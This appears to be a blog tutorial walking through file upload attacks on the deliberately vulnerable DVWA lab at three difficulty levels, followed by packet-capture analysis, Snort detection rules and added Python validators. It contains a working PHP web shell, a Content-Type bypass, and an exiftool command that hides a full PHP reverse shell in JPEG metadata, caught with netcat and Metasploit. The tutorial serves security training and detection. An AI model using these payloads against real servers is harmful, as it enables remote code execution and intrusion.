File upload Vulnerability [DVWA]
Today, we will be covering file upload vulnerabilities. Our goal for today is
Methodology:
When a web server allows users to upload files to its filesystem without sufficiently validating their name, type, contents, or size, failing to properly enforce restrictions on these could mean that even a basic image upload function can be used to upload arbitrary and potentially dangerous files instead. This could even include server-side script files that enable remote code execution.
How to carry out a File Upload attack?
Low:
Remember the reverse shell that we had in our RFI attack? We can upload that to the web application while Netcat listens for the connection. Let's do it.
Note: make sure your anti-virus is disabled.
Let's set up our Netcat listener.
nc -nlvp 1337
Let's upload our reverse shell to the server.
Here is an example of a one-liner PHP web shell (it executes whatever is passed in the cmd parameter):
<?php system($_REQUEST["cmd"]); ?>
Medium:
Let's switch the difficulty to Medium and try to upload one_liner.php to the web application.
As we can see, the web server does not accept uploads other than JPEG or PNG images. That means we have to make the server believe that the PHP file we are uploading is an image by modifying the HTTP request. To do this, we will use Burp Suite.
Proxy -> Intercept -> Open Browser -> Log into DVWA using Burp Browser ->
Click Upload, and you will get this:
Go to Burp suite -> Proxy -> HTTP history
Locate the POST /DVWA/vulnerabilities/upload request and right-click it.
Then, click Send to Repeater.
Then, click on the Repeater tab and click Send to see what the response looks like.
This is equivalent to what we have here:
Anyway, let's focus on this portion of the request:
We can try changing .php to .jpeg to see if that bypasses the filter. That didn't work; we still got the same error.
Let's revert that change, change the Content-Type header instead, and see what happens.
Our PHP has been successfully uploaded. As we can see, we managed to execute whoami.
High:
First, we will save an image.
Then, we will use this command to store our PHP inside the JPEG's metadata.
exiftool -DocumentName='/*<?php /**/ error_reporting(0); $ip = "192.168.233.189"; $port = 4444; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } elseif (($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } elseif (($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } else { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; eval($b); die(); __halt_compiler();' PictureName.jpeg
My picture name was Sunflower_small.jpg.
Remember to change the IP to your attack VM's address.
We can use this command to see what we put inside the picture:
exiftool pictureName.jpg
Let's open Metasploit by typing msfconsole in the command prompt. Then, type use exploit/multi/handler -> set payload php/meterpreter/reverse_tcp -> show options -> set LHOST to the attacker IP -> run
Now, upload our picture.
There you go, we have a shell.
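As an added example (not DVWA's code and not the author's), here is the Medium-level check that the Content-Type change above bypasses, next to a hardened validator that also refuses the PHP embedded in image metadata from the High section. The Medium logic is a simplified reproduction of DVWA's Content-Type and size test; the sample uploads, file names and the hardened_check function are constructed for this illustration, and a JPEG comment segment stands in for the EXIF DocumentName tag since the body scan catches both.

```python
import re

# Added example, not DVWA's own code; every sample below is constructed.
ALLOWED_EXT = {"jpg", "jpeg", "png"}
ALLOWED_MIME = {"image/jpeg", "image/png"}
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png"}
PHP_TAG = re.compile(rb"<\?")  # <?php, <?= and short tags (XMP <?xpacket trips it too)
WEBSHELL = b'<?php system($_REQUEST["cmd"]); ?>'

def dvwa_medium_check(content_type, size):
    # Simplified Medium-level logic: only the client-supplied Content-Type and
    # the size are inspected, so the one-liner sent as image/jpeg gets through.
    return content_type in ALLOWED_MIME and size < 100000

def hardened_check(filename, content_type, data):
    """Return (accepted, reason). Extension, Content-Type and magic bytes must
    all agree, and the whole body is scanned so code hidden in metadata
    (the exiftool trick above) is refused as well."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if content_type not in ALLOWED_MIME:
        return False, "content-type not allowed"
    kind = next((k for m, k in MAGIC.items() if data.startswith(m)), None)
    if kind is None or (kind == "jpeg") != (ext != "png"):
        return False, "magic bytes do not match extension"
    if PHP_TAG.search(data):
        return False, "PHP open tag inside file body"
    return True, "ok"

def jpeg_with_comment(text):
    # Constructed minimal JPEG: SOI marker, one COM segment, EOI marker.
    body = text.encode()
    return b"\xff\xd8\xff\xfe" + (len(body) + 2).to_bytes(2, "big") + body + b"\xff\xd9"

def run_samples():
    """Run constructed uploads through both checks -> {name: (medium, hardened)}."""
    samples = {
        "medium_bypass": ("one_liner.php", "image/jpeg", WEBSHELL),
        "renamed_php": ("one_liner.jpeg", "image/jpeg", WEBSHELL),
        "exif_embedded": ("Sunflower_small.jpg", "image/jpeg",
                          jpeg_with_comment("/*<?php /**/ echo 'marker'; __halt_compiler();")),
        "clean_photo": ("Sunflower_small.jpg", "image/jpeg", jpeg_with_comment("just a photo")),
    }
    return {n: (dvwa_medium_check(ct, len(d)), hardened_check(fn, ct, d)[0])
            for n, (fn, ct, d) in samples.items()}

if __name__ == "__main__":
    for name, (medium, hardened) in run_samples().items():
        print(f"{name:14} medium={medium!s:5} hardened={hardened}")
```

Only the clean photo passes the hardened check, while all four samples pass the Medium check; serving the upload directory without PHP execution remains the backstop for whatever a scan misses.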
Network Perspective
Let's capture the file upload attack using pfSense.
Let's upload our reverse_tcp payload.
You can find the packet capture of the file upload attack here:
Whenever we open a PCAP file, we first need to decide what we are looking for. For this attack, we will focus on HTTP traffic and any sign of an adversary submitting a file or executing commands.
We can create a display filter that only shows HTTP traffic by typing http into the filter bar (Wireshark filter names are lowercase).
That cleared out the rest of the information we didn't need.
Additionally, we can see the command the adversary executed in the URL. After the command completes, the server answers with HTTP/1.1 200 OK, and that response carries the command's output inside the packet.
We can use this as a sign of whether the attack succeeded: if nothing is returned from the cmd request, the attack failed; if something is returned, we can assume the attack was successful.
How to detect File Injection using Snort?
Let's pretend we created something similar to what DVWA has.
What we can do is monitor for other types of file extensions being submitted.
For example, we only accept pictures such as JPEG and PNG, so we can create Snort rules that alert on other file extensions. Let's get right into it.
sudo nano /etc/snort/rules/local.rules
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|jpeg"; http_uri; msg: "File Injection Detected"; sid: 1000001; rev: 1;)
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|png"; http_uri; msg: "File Injection Detected"; sid: 1000002; rev: 1;)
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|jpg"; http_uri; msg: "File Injection Detected"; sid: 1000003; rev: 1;)
Let's cover the first rule; it will be easier to understand the rest after you understand the first one.
Alert me when you find a TCP connection going to 172.20.25.16 on port 80 (HTTP), the HTTP request method is GET, and the HTTP URI does not contain .jpeg; the other two rules do the same for .png and .jpg. Each rule needs its own sid, since Snort refuses to load two rules with the same sid.
Note: |2E| is the hexadecimal for the . (dot) character.
Let's test our rule to see if it works!
sudo snort -c /etc/snort/snort.conf
Let's try uploading a Python file to see if Snort detects it.
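As an added example (not the article's code and not Snort's), a small Python evaluator for the logic of the three rules and of the PCAP review above, run over constructed HTTP request lines. It shows that three separate rules each negating one extension also alert on legitimate .jpg and .png fetches (a .png URI lacks ".jpeg"), whereas one rule carrying all three negated matches behaves the way the explanation describes; the /hackable/uploads/ path is an assumption about where DVWA serves uploaded files and is not from the article.

```python
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the original article: evaluates the logic of the
# three Snort rules above against constructed HTTP request lines, the way a
# PCAP review would. /hackable/uploads/ is assumed (not from the article) to
# be the directory DVWA serves uploads from; sids are numbered 1..3 here.
IMAGE_EXTS = (".jpeg", ".png", ".jpg")
UPLOAD_DIR = "/hackable/uploads/"
REQUESTS = [  # constructed request lines
    "GET /hackable/uploads/Sunflower_small.jpg HTTP/1.1",
    "GET /hackable/uploads/logo.png HTTP/1.1",
    "GET /hackable/uploads/one_liner.php?cmd=whoami HTTP/1.1",
    "GET /hackable/uploads/script.py HTTP/1.1",
    "GET /DVWA/vulnerabilities/upload/ HTTP/1.1",
    "POST /DVWA/vulnerabilities/upload/ HTTP/1.1",
]

def separate_rules_fire(method, target):
    """The three rules as written: each negates ONE extension, so a GET for a
    .png trips the .jpeg rule and vice versa. Returns the sids that fire."""
    sids = []
    for sid, ext in ((1000001, ".jpeg"), (1000002, ".png"), (1000003, ".jpg")):
        if method == "GET" and ext not in target:
            sids.append(sid)
    return sids

def combined_rule_fires(method, target, scope=None):
    """One rule carrying all three negated content matches, which is what the
    explanation above ('anything but .jpeg, .png, .jpg') describes. `scope`
    limits it to the upload directory so ordinary page loads stay quiet."""
    if method != "GET" or (scope is not None and scope not in target):
        return False
    return not any(ext in target for ext in IMAGE_EXTS)

def has_command_param(target):
    # The ?cmd= pattern seen in the PCAP: the web shell's argument travels in
    # the query string, so the executed command is readable in the URL.
    return "cmd" in parse_qs(urlsplit(target).query)

def evaluate_requests(lines=REQUESTS):
    """-> list of (target, separate_sids, combined, scoped, cmd_in_url)."""
    rows = []
    for line in lines:
        method, target, _ = line.split(" ", 2)
        rows.append((target, separate_rules_fire(method, target),
                     combined_rule_fires(method, target),
                     combined_rule_fires(method, target, UPLOAD_DIR),
                     has_command_param(target)))
    return rows
```

The unscoped combined rule still alerts on every non-image page such as the upload form itself, so in practice the rule should be anchored to the upload directory, and note that Snort content matches are case-sensitive unless nocase is added.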
That is all I have for the File Injection Vulnerability. The next vulnerability we will be covering is SQL Injection.
Comment from a Cybersecurity Specialist | MSc. Computer Science Engineering (2 years ago): Thanks for sharing Nguyen N. Nice to see how you embedded the PHP code into a JPEG file!